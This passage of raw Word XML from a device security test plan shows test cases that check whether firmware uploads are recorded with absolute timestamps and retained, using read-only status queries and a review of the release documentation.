            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CF64A11" w14:textId="7DB45CFC"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00A11297" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.11 / CR 3.9 </w:t>
            </w:r>
            <w:r w:rsidR="00A11297" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7243088E" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99"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906341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="794FAE05" w14:textId="6852F204" w:rsidR="00906341" w:rsidRPr="006D5B99"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SVV-3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70C3C311" w14:textId="5F1DCB4A" w:rsidR="00906341" w:rsidRPr="006D5B99"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6D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7239B9CE"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Read the uptime reference and current version before an upload.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9A0235"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Perform an upload (forces install restart).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E537429" w14:textId="77777777" w:rsidR="00093A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After restart, read the uptime reference and version.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="202F4672" w14:textId="56948997" w:rsidR="00906341" w:rsidRPr="006D5B99"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time base reset and that no absolute date/time is associated with the upload event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00906341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC7C299" w14:textId="77777777" w:rsidR="00093A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a per-upload absolute timestamp is recorded and retained. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76EF2E12" w14:textId="7425CA2C" w:rsidR="00906341" w:rsidRPr="006D5B99"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FAIL: uptime resets, no real-time clock, no absolute time on the version change </w:t>
            </w:r>
            <w:r w:rsidR="007F04F8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> --&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> per-upload retention clock cannot be started.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="097ADBD8" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4950B074" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">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6D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6673343F" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99"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06341" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00906341" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="545EC6D3" w14:textId="512E4A91" w:rsidR="00906341" w:rsidRPr="006D5B99"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TC-RQ013-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05CF2" w:rsidRPr="006D5B99"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D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CF12771" w14:textId="77777777" w:rsidR="006644EB" w:rsidRPr="006D5B99" w:rsidRDefault="006644EB"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See</w:t>
            </w:r>
            <w:r w:rsidR="00D05CF2" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> TC-RQ003-04  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67EE9FFC" w14:textId="0A82E98E"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Kali, plus TIA laptop for triggering the update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05CF2" w:rsidRPr="006D5B99"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D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318EDE4B" w14:textId="76AB17D3" w:rsidR="00D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">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 TIA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05CF2" w:rsidRPr="006D5B99"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D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CBDE447"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3BEB3D8D"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Reuse the TC-RQ003-04 procedure, replacing 'Event 1'/'Event 2' with an</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AA5282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official firmware upload/install (as in TC-RQ013-02):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D03645F"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cm_rq013-03_systick_00_baseline.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462E6D6C" w14:textId="593CAC84"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cm_rq013-03_log_00_baseline.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E28AB10" w14:textId="771CEF8E"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lastRenderedPageBreak/>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> perform the official firmware upload/install (rotary 999, upload,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7937750D" w14:textId="419B3A63"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w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F9277D2" w14:textId="77777777"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http://$SRIO/systemtime/systick/getdata | tee cm_rq013-03_systick_01_after_update.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="110B961F" w14:textId="7E459E02" w:rsidR="00D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">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r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> | tee cm_rq013-03_log_01_after_update.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628D84E3" w14:textId="048AED25" w:rsidR="00D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF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diff cm_rq013-03_log_00_baseline.json cm_rq013-03_log_01_after_update.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D05CF2" w:rsidRPr="006D5B99"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8B1817" w:rsidR="00D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF8F4F2" w14:textId="2296316C" w:rsidR="00D05CF2" w:rsidRPr="006D5B99" w:rsidRDefault="00D05CF2" w:rsidP="00D05CF2">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As TC-RQ003-04/TC-RQ008-04 </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> systick resets, no absolute timestamp exists for the upload event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59BD765A" w14:textId="77777777" w:rsidR="00906341" w:rsidRPr="006D5B99" w:rsidRDefault="00906341" w:rsidP="00906341">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC34F44" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C4AFAE" w14:textId="699677F8" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ013-04 - </w:t>
      </w:r>
      <w:r w:rsidR="00205481" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>External-Record (Release-Notes) Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25948718" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">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6D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="428491CE"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21429E53" w14:textId="6512FA94" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve">RQ-013 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 2.9 (compensating) </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset I, Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6967F5CC" w14:textId="4A428B1F" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76EB9834" w14:textId="23EC4568" w:rsidR="005B34C4"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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75E74511" w14:textId="6E901697" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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Assess whether the external release documentation provides per-unit (per-serial), timestamped, tamper-evident, five-year, per-upload records for the specific physical unit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6545BC65" w14:textId="77777777" w:rsidR="00AA306B"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Review the external release documentation available for the unit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="101BFB78" w14:textId="3F596095" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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Assess it against the criteria: device-resident? per-serial? tamper-evident? guaranteed five-year per-upload retention? per-upload timestamp?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B34C4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="143FCE8B" w14:textId="58CBA39C" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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the external records are not device-resident, not per-serial, not tamper-evident, and provide no guaranteed per-upload timestamped five-year retention </w:t>
            </w:r>
            <w:r w:rsidR="007A7932" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the external record cannot cure the on-device gap for a specific unit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278F9D7B" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B992DDB" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99" w:rsidRDefault="005B34C4" w:rsidP="005B34C4">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6D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48729921" w14:textId="77777777" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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5B34C4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="005B34C4" w:rsidP="00FC20AC">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="431A6EAB" w14:textId="5FD38C9C" w:rsidR="005B34C4" w:rsidRPr="006D5B99"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TC-RQ013-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59CE" w:rsidRPr="006D5B99"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7B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59CE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7595582D" w14:textId="5C25ED02"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xml:space="preserve">document review </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59CE" w:rsidRPr="006D5B99"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7B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59CE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68958864" w14:textId="31401B90"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Web browser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59CE" w:rsidRPr="006D5B99"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7B59CE" w:rsidRPr="006D5B99" w:rsidRDefault="007B59CE" w:rsidP="007B59CE">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
